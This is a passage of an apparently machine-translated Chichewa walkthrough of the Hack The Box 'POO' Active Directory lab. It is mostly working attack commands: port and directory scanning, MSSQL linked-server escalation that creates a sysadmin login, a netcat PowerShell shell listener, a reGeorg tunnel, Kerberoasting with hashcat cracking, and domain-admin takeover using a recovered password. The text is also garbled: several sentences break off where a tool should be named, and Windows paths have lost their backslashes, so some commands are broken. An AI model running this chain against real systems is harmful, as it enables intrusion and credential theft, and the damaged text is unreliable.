M'nkhaniyi tisanthula ndimeyi osati makina okha, koma mini-laboratory yonse kuchokera pamalowo
Monga tafotokozera m'mafotokozedwewo, POO idapangidwa kuti iziyesa luso pamagawo onse akuwukiridwa pamalo ang'onoang'ono a Active Directory. Cholinga chake ndikusokoneza wolandila, kukulitsa mwayi, ndikusokoneza dera lonselo ndikutolera mbendera 5.
Kulumikizana kwa labotale kumayendetsedwa ndi VPN. Ndibwino kuti musagwirizane ndi makompyuta a ntchito kapena kuchokera kwa wolandira kumene kuli deta yofunikira kwa inu, chifukwa mumathera pa intaneti yachinsinsi ndi anthu omwe amadziwa chinachake pankhani ya chitetezo cha chidziwitso :)
zambiri za bungwe
Kuti mudziwe za nkhani zatsopano, mapulogalamu ndi zina, ndidalenga
Zambiri zimaperekedwa pazolinga zamaphunziro zokha. Mlembi wa chikalatachi alibe udindo uliwonse wa kuwonongeka kwa wina aliyense chifukwa chogwiritsa ntchito chidziwitso ndi njira zomwe adapeza chifukwa chophunzira chikalatachi.
tsamba loyambilira
Mapeto amasewerawa ali ndi makina awiri, ndipo ali ndi mbendera 5.
Kufotokozera ndi adilesi ya olandila omwe alipo amaperekedwanso.
Tiyeni tiyambe!
Recon mbendera
Makinawa ali ndi adilesi ya IP ya 10.13.38.11, yomwe ndimawonjezera ku /etc/hosts.
10.13.38.11 poo.htb
Choyamba, timasanthula madoko otseguka. Popeza kusanthula madoko onse ndi nmap kumatenga nthawi yayitali, ndichita izi pogwiritsa ntchito masscan. Timasanthula madoko onse a TCP ndi UDP kuchokera pa mawonekedwe a tun0 pa liwiro la mapaketi 500 pamphindikati.
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
Tsopano, kuti tidziwe zambiri za ntchito zomwe zikuyenda pamadoko, tiyeni tiyesere ndi -A mwina.
nmap -A poo.htb -p80,1433
Chifukwa chake tili ndi ntchito za IIS ndi MSSQL. Pankhaniyi, tipeza dzina lenileni la DNS la domain ndi kompyuta. Pa seva yapaintaneti timalonjeredwa ndi tsamba lanyumba la IIS.
Tiyeni tidutse muakalozera. Ndimagwiritsa ntchito gobuster kwa izi. M'magawo tikuwonetsa kuchuluka kwa ulusi 128 (-t), URL (-u), mtanthauzira mawu (-w) ndi zowonjezera zomwe zimatisangalatsa (-x).
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
Izi zimatipatsa chitsimikiziro cha HTTP cha chikwatu cha/admin, komanso ntchito yapakompyuta yofikirika ya .DS_Store. .DS_Store ndi mafayilo omwe amasunga zokonda zafoda, monga mndandanda wamafayilo, malo azithunzi, ndi chithunzi chakumbuyo chomwe mwasankha. Fayilo yotereyi imatha kukhala m'ndandanda wa seva yapaintaneti ya opanga mawebusayiti. Mwanjira imeneyi timapeza zambiri za zomwe zili mu bukhuli. Kwa ichi mungagwiritse ntchito
python3 dsstore_crawler.py -i http://poo.htb/
Timapeza zomwe zili m'ndandanda. Chosangalatsa kwambiri apa ndi / dev directory, momwe tingayang'anire magwero ndi mafayilo a db munthambi ziwiri. Koma titha kugwiritsa ntchito zilembo 6 zoyambirira zamafayilo ndi mayina ngati ntchitoyo ili pachiwopsezo cha IIS ShortName. Mutha kuyang'ana kusatetezeka uku pogwiritsa ntchito
Ndipo timapeza fayilo imodzi yomwe imayamba ndi "poo_co". Posadziwa choti ndichite kenako, ndinangosankha mawu onse oyambira ndi βcoβ mumtanthauzira mawu.
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt
Ndipo tidzakonza pogwiritsa ntchito wfuzz.
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
Ndipo timapeza mawu oyenera! Timayang'ana fayiloyi, sungani zidziwitso (kuweruza ndi DBNAME parameter, akuchokera ku MSSQL).
Timapereka mbendera ndikupititsa patsogolo 20%.
Uwu mbendera
Timalumikizana ndi MSSQL, ndimagwiritsa ntchito DBeaver.
Sitipeza chilichonse chosangalatsa m'dawunilodi iyi, tiyeni tipange SQL Editor ndikuwona ogwiritsa ntchito omwe alipo.
SELECT name FROM master..syslogins;
Tili ndi ogwiritsa ntchito awiri. Tiyeni tione mwayi wathu.
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
Choncho, palibe mwayi. Tiyeni tiwone ma seva olumikizidwa, ndidalemba za njirayi mwatsatanetsatane
SELECT * FROM master..sysservers;
Umu ndi momwe timapezera SQL Server ina. Tiyeni tiyese machitidwe a malamulo pa seva iyi pogwiritsa ntchito openquery().
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');
Ndipo titha kumanganso mtengo wamafunso.
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');
Mfundo ndi yakuti pamene tipempha kwa seva yolumikizidwa, pempholo limachitidwa pamutu wa wogwiritsa ntchito wina! Tiyeni tiwone m'nkhani yomwe tikugwiritsa ntchito pa seva yolumikizidwa.
SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');
Tsopano tiyeni tiwone momwe pempho limapangidwa kuchokera ku seva yolumikizidwa ndi yathu!
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');
Chifukwa chake ndiye nkhani ya DBO yomwe iyenera kukhala ndi mwayi wonse. Tiyeni tiwone mwayi ngati pempho kuchokera ku seva yolumikizidwa.
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
Monga mukuonera, tili ndi mwayi wonse! Tipange ma admin athu motere. Koma samaloleza kudzera poyera, tiyeni tichite izi kudzera mu EXECUTE AT.
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
Ndipo tsopano tikulumikizana ndi zidziwitso za wogwiritsa ntchito watsopano, timawona nkhokwe yatsopano ya mbendera.
Timapereka mbendera iyi ndikupitilira.
Mbendera ya BackTrack
Tiyeni titenge chipolopolo pogwiritsa ntchito MSSQL, ndimagwiritsa ntchito mssqlclient kuchokera pa phukusi la impacket.
mssqlclient.py ralf:[email protected] -db POO_PUBLIC
Tiyenera kupeza mawu achinsinsi, ndipo chinthu choyamba chomwe takumana nacho ndi tsamba lawebusayiti. Chifukwa chake, timafunikira kasinthidwe ka seva yapaintaneti (sizingatheke kusiya chipolopolo chosavuta, mwachiwonekere chowotcha moto chikuyenda).
Koma mwayi waletsedwa. Ngakhale titha kuwerenga fayilo kuchokera ku MSSQL, timangofunika kudziwa kuti ndi zilankhulo ziti zomwe zimakhazikitsidwa. Ndipo mu bukhu la MSSQL timapeza kuti pali Python.
Ndiye palibe vuto kuwerenga fayilo ya web.config.
EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"
Ndi zidziwitso zomwe zapezeka, pitani ku / admin ndikutenga mbendera.
Mbendera yapansi
M'malo mwake, pali zovuta zina zogwiritsa ntchito chozimitsa moto, koma tikayang'ana pamanetiweki, tikuwona kuti IPv6 imagwiritsidwanso ntchito!
Tiyeni tiwonjezere adilesi iyi ku /etc/hosts.
dead:babe::1001 poo6.htb
Tiyeni tiyang'anenso wolandirayo, koma pogwiritsa ntchito protocol ya IPv6.
Ndipo ntchito ya WinRM ikupezeka pa IPv6. Tiyeni tigwirizane ndi zovomerezeka zomwe zapezeka.
Pali mbendera pa desktop, timapereka.
Mbendera ya P00
Pambuyo pochita reconnaissance pa khamu ntchito
setspn.exe -T intranet.poo -Q */*
Tiyeni tiyendetse lamulo kudzera pa MSSQL.
Pogwiritsa ntchito njirayi, timapeza SPN ya ogwiritsa ntchito p00_hr ndi p00_adm, zomwe zikutanthauza kuti ali pachiwopsezo chowukiridwa monga Kerberoasting. Mwachidule, titha kupeza mawu achinsinsi awo.
Choyamba muyenera kupeza chipolopolo chokhazikika ngati wogwiritsa ntchito MSSQL. Koma popeza ndife operewera, timalumikizana ndi wolandirayo kudzera pamadoko 80 ndi 1433. Koma ndizotheka kuwongolera magalimoto kudzera padoko 80! Kwa izi tidzagwiritsa ntchito
Koma pamene tiyesa kuyipeza, timapeza cholakwika cha 404. Izi zikutanthauza kuti * .aspx mafayilo sakuchitidwa. Kuti mafayilo okhala ndi zowonjezera izi achitidwe, yikani ASP.NET 4.5 motere.
dism /online /enable-feature /all /featurename:IIS-ASPNET45
Ndipo tsopano, tikafika ku tunnel.aspx, timalandira yankho kuti zonse zakonzeka kupita.
Tiyeni tiyambitse gawo lamakasitomala la pulogalamuyi, yomwe itumiza magalimoto. Tidzatumiza magalimoto onse kuchokera ku doko 5432 kupita ku seva.
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
Ndipo timagwiritsa ntchito ma proxychains kutumiza kuchuluka kwa ntchito iliyonse kudzera pa proxy yathu. Tiyeni tiwonjeze woyimira uyu ku fayilo yosinthira /etc/proxychains.conf.
Tsopano tiyeni tiyike pulogalamuyo ku seva
Tsopano tikuyambitsa womvera kudzera pa MSSQL.
xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321
Ndipo timalumikizana ndi proxy yathu.
proxychains rlwrap nc poo.htb 4321
Ndipo tiyeni titenge ma hashes.
. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt
Tsopano muyenera kubwereza ma hashes awa. Popeza mtanthauzira mawu wa rockyou mulibe mawu achinsinsiwa, ndidagwiritsa ntchito mawu ONSE achinsinsi omwe aperekedwa mu Seclists. Pakusaka timagwiritsa ntchito hashcat.
hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force
Ndipo timapeza mawu achinsinsi onse awiri, yoyamba mudikishonale dutch_passwordlist.txt, ndipo yachiwiri mu Keyboard-Combinations.txt.
Ndipo kotero tili ndi ogwiritsa ntchito atatu, tiyeni tipite kwa woyang'anira domain. Choyamba timapeza adilesi yake.
Zabwino, tapeza adilesi ya IP ya woyang'anira dera. Tiyeni tipeze onse ogwiritsira ntchito domeni, komanso kuti ndani mwa iwo ali woyang'anira. Kuti mutsitse zolemba kuti mupeze zambiri PowerView.ps1. Kenaka tidzagwirizanitsa pogwiritsa ntchito zoipa-winrm, kufotokoza chikwatu ndi script mu -s parameter. Kenako tingoyika zolemba za PowerView.
Tsopano tili ndi mwayi wopeza ntchito zake zonse. Wogwiritsa ntchito p00_adm amawoneka ngati wogwiritsa ntchito mwayi, ndiye tigwira ntchito yake. Tiyeni tipange chinthu cha PSCredential cha wosuta uyu.
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass
Tsopano malamulo onse a Powershell omwe timatchula Creds adzachitidwa ngati p00_adm. Tiyeni tiwonetse mndandanda wa ogwiritsa ntchito ndi mawonekedwe a AdminCount.
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
Ndipo kotero, wosuta wathu alidi mwayi. Tiyeni tiwone magulu omwe ali nawo.
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
Pomaliza timatsimikizira kuti wogwiritsa ntchito ndi domeni. Izi zimamupatsa ufulu wolowa kwa woyang'anira madambwe patali. Tiyeni tiyesetse kulowa kudzera pa WinRM pogwiritsa ntchito njira yathu. Ndinasokonezedwa ndi zolakwika zopangidwa ndi reGeorg pogwiritsa ntchito evil-winrm.
Ndiye tiyeni tigwiritse ntchito ina, yosavuta,
Timayesa kugwirizanitsa, ndipo tili mu dongosolo.
Koma palibe mbendera. Kenako yang'anani wogwiritsa ntchito ndikuyang'ana ma desktops.
Timapeza mbendera pa mr3ks ndipo labotale yatha 100%.
Ndizomwezo. Monga ndemanga, chonde perekani ndemanga ngati mwaphunzira china chatsopano m'nkhaniyi komanso ngati chinali chothandiza kwa inu.
Mutha kulowa nafe pa
Source: www.habr.com